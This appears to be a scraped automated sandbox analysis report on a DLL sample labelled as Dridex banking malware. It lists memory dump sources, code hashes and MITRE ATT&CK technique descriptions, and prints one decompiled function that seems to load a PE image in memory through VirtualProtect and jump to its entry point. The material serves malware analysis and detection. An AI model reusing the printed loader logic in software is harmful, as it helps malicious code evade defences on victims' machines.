0x6f506da3
0x6f506da6
0x6f506da9

Memory Dump Source

Source File: 00000001.00000002.738911371.000000006F501000.00000020.00020000.sdmp, Offset: 6F500000, based on PE: true

Associated: 00000001.00000002.738884438.000000006F500000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739011384.000000006F51A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739077298.000000006F51D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.739123881.000000006F51F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32a91f0b38b7866324236bbe4994f9af1432daa0934583f74212f6fc0a42b7f3
Instruction ID: 3c7188d72b84454e0ff176df997495230ae43de982e0b0f10e319629ca7246e7
Opcode Fuzzy Hash: 32a91f0b38b7866324236bbe4994f9af1432daa0934583f74212f6fc0a42b7f3
Instruction Fuzzy Hash: 1A11D0B8A15A01CF874ACF05D2918517FF2BB8D36031281AAD8094B366D734FD59CF64

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 4232 Parent PID: 1228 rundll32.exeCOMMON

Executed Functions

Function 02A92092, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 224
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E02A92092(long __ebx, void* __edi, long __esi, intOrPtr* _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				char* _v72;
				int _v76;
				long _v80;
				long _v84;
				DWORD* _v88;
				intOrPtr _v92;
				int _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				void* _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				signed int _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				int _v156;
				char* _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				char* _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				char _v188;
				intOrPtr* _t140;
				int _t147;
				int _t155;
				int _t159;
				intOrPtr _t174;
				int _t183;
				intOrPtr _t226;
				void* _t233;
				intOrPtr _t236;
				void* _t243;
				intOrPtr* _t247;
				unsigned int _t250;
				intOrPtr _t259;
				DWORD* _t271;
				void* _t275;
				intOrPtr* _t278;
				intOrPtr* _t279;

				_t140 = _a4;
				_v20 = 0;
				_t243 =  *((intOrPtr*)(_t140 + 0x44));
				 *0x2a94418 = 1;
				asm("movaps xmm0, [0x2a93010]");
				asm("movups [0x2a94428], xmm0");
				_v48 = _t140;
				_v52 =  *((intOrPtr*)(_t140 + 0x48));
				_v56 =  *((intOrPtr*)(_v48 + 0x38));
				_v188 = _t243;
				_v184 =  *((intOrPtr*)(_v48 + 0x58));
				_v180 = 4;
				_v176 =  &_v20;
				_v60 =  *((intOrPtr*)(_t140 + 0x54));
				_v64 = 4;
				_v68 = _t243;
				_v72 =  &_v20;
				_t147 = VirtualProtect(__edi, __ebx, __esi, _t271); // executed
				_v76 = _t147;
				_v188 = _v68;
				_v184 = 0;
				_v180 =  *((intOrPtr*)(_v48 + 0x58));
				_v80 = 0x400;
				_v84 = 2;
				_v88 =  &_v20;
				_v92 = 0;
				E02A91770();
				E02A917BD(_v68,  *((intOrPtr*)(_v48 + 0x28)), _v56);
				E02A91770( *((intOrPtr*)(_v48 + 0x28)), 0, _v56);
				_t155 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
				_t278 = _t275 - 0x8c;
				_t233 = _v68;
				_t259 =  *((intOrPtr*)(_t233 + 0x3c));
				_v96 = _t155;
				_v100 = _v68 + 0x3c;
				_v104 = _t233;
				_v108 = _t259;
				if(_t259 != 0) {
					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v120 = _v104;
				if(_v60 != 0) {
					_v124 = 0;
					_v128 = _v120 + 0x18 + ( *(_v120 + 0x14) & 0x0000ffff);
					while(1) {
						_t174 = _v128;
						_t250 =  *(_t174 + 0x24);
						_v140 = _t174;
						_v144 = _t250 >> 0x1f;
						_v148 =  *((intOrPtr*)(_v140 + 8));
						_v188 = _v68 +  *((intOrPtr*)(_v140 + 0xc));
						_v184 = _v148;
						_v180 =  *((intOrPtr*)(0x2a94418 + ((_t250 >> 0x0000001e & 0x00000001) << 4) + (_v144 << 3) + ((_t250 >> 0x0000001d & 0x00000001) << 2)));
						_v176 =  &_v20;
						_v152 = _v124;
						_t183 = VirtualProtect(??, ??, ??, ??); // executed
						_t278 = _t278 - 0x10;
						_t226 = _v152 + 1;
						_v156 = _t183;
						_v124 = _t226;
						_v128 = _v140 + 0x28;
						if(_t226 == _v60) {
							goto L8;
						}
					}
				}
				L8:
				 *_t278 = _v68;
				_v132 = _v68 +  *((intOrPtr*)(_v48 + 0x24));
				_t159 = DisableThreadLibraryCalls(??);
				_t279 = _t278 - 4;
				_t236 =  *_v100;
				_v136 = _t159;
				_v112 = _t236;
				_v116 = _v68;
				if(_t236 != 0) {
					_v116 = _v68 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t247 = _v48;
				_v44 =  *((intOrPtr*)(_t247 + 0x50));
				_v40 =  *_t247;
				_v36 =  *((intOrPtr*)(_t247 + 0x18));
				_v32 =  *((intOrPtr*)(_t247 + 0x4c));
				_v28 =  *((intOrPtr*)(_t247 + 0x10));
				_v24 = _v132;
				 *_t279 = _t247;
				_v188 = 0;
				_v184 = 0x60;
				_v160 =  &_v44;
				_v164 = 0;
				_v168 = 0x60;
				_v172 =  *((intOrPtr*)(_v116 + 0x28));
				E02A91770();
				if(_v172 != 0) {
					_t279 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}

0x02a9209e
0x02a920ac
0x02a920b3
0x02a920b6
0x02a920c0
0x02a920c7
0x02a920d1
0x02a920d7
0x02a920e0
0x02a920e9
0x02a920ec
0x02a920f0
0x02a920f8
0x02a920ff
0x02a92102
0x02a92105
0x02a92108
0x02a9210b
0x02a92125
0x02a9212b
0x02a9212e
0x02a92136
0x02a9213a
0x02a9213d
0x02a92140
0x02a92143
0x02a92146
0x02a92162
0x02a9217f
0x02a921a4
0x02a921a6
0x02a921af
0x02a921b2
0x02a921bc
0x02a921bf
0x02a921c2
0x02a921c5
0x02a921c8
0x02a92216
0x02a92216
0x02a92249
0x02a9224c
0x02a9225c
0x02a9225f
0x02a922a8
0x02a922a8
0x02a922b7
0x02a922bf
0x02a922cd
0x02a922dc
0x02a9230d
0x02a92316
0x02a9231a
0x02a9231e
0x02a92325
0x02a9232b
0x02a9232d
0x02a92336
0x02a92347
0x02a9234d
0x02a92350
0x02a92353
0x00000000
0x00000000
0x02a92359
0x02a922a8
0x02a92264
0x02a92272
0x02a9227a
0x02a9227d
0x02a9227f
0x02a92285
0x02a92291
0x02a92297
0x02a9229a
0x02a9229d
0x02a921f9
0x02a921f9
0x02a9236e
0x02a92374
0x02a92379
0x02a9237f
0x02a92385
0x02a9238b
0x02a92391
0x02a92394
0x02a92397
0x02a9239f
0x02a923a7
0x02a923ad
0x02a923b3
0x02a923b9
0x02a923bf
0x02a923cd
0x02a921da
0x02a921e0
0x02a921e0
0x02a92234

APIs

VirtualProtect.KERNELBASE ref: 02A9210B
VirtualProtect.KERNELBASE ref: 02A921A4
VirtualProtect.KERNELBASE ref: 02A9232B

Strings

`, xrefs: 02A9239F

Memory Dump Source

Source File: 00000004.00000002.394450208.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: `
API String ID: 544645111-2679148245
Opcode ID: f9d28aab6ac2089fa3f7829798f667d13c141f07a828e74042836621a435999f
Instruction ID: 036090fa6a9fec4d782ef3d807613b193dae92e12d1abb70f7b358a73ef7bbac
Opcode Fuzzy Hash: f9d28aab6ac2089fa3f7829798f667d13c141f07a828e74042836621a435999f
Instruction Fuzzy Hash: 12B1CDB4E00219DFCB14CFA9C880A9DFBF1BF88304F15856AE958AB351D731A985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02A91000, Relevance: 1.4, APIs: 1, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 02A910FF

Memory Dump Source

Source File: 00000004.00000002.394450208.0000000002A90000.00000040.00000001.sdmp, Offset: 02A90000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a57c29dcdcfacf9aa16c2e0c098cfba5b3c29415035591b01ff4a810787df466
Instruction ID: c768e407be8dfdbb2d1719c90ff8fbcc4f01d425466d3256e7d8ebdfadc42b60
Opcode Fuzzy Hash: a57c29dcdcfacf9aa16c2e0c098cfba5b3c29415035591b01ff4a810787df466
Instruction Fuzzy Hash: C54106B5E0520A8FDB04CFA9C5906AEBBF1FF48314F18852DD448AB340D775A841CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report SecuriteInfo.com.W32.AIDetect.malware1.23460.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Dridex

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

Function 6F510730, Relevance: 5.2, APIs: 3, Instructions: 650
COMMONCrypto

Function 6F512234, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Function 6F512820, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Function 6F513138, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 01582092, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 224
memoryCOMMON

Function 6F515E84, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45
fileCOMMON

Function 6F5110A4, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Function 6F5157B4, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Function 6F515B3C, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Function 015826AA, Relevance: 1.6, APIs: 1, Instructions: 70
COMMON

Function 6F511166, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Function 6F515BE5, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 6F515BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 6F515BD1, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Function 6F515BB3, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Function 6F515C01, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Function 6F515E10, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Function 6F51564C, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Function 6F511030, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Function 6F513628, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Function 6F501494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Function 6F50A4E8, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Function 6F508428, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Function 6F519370, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Function 6F51143C, Relevance: .6, Instructions: 572
COMMONCrypto

Function 6F506D0C, Relevance: .0, Instructions: 36
COMMON

Function 02A92092, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 224
memoryCOMMON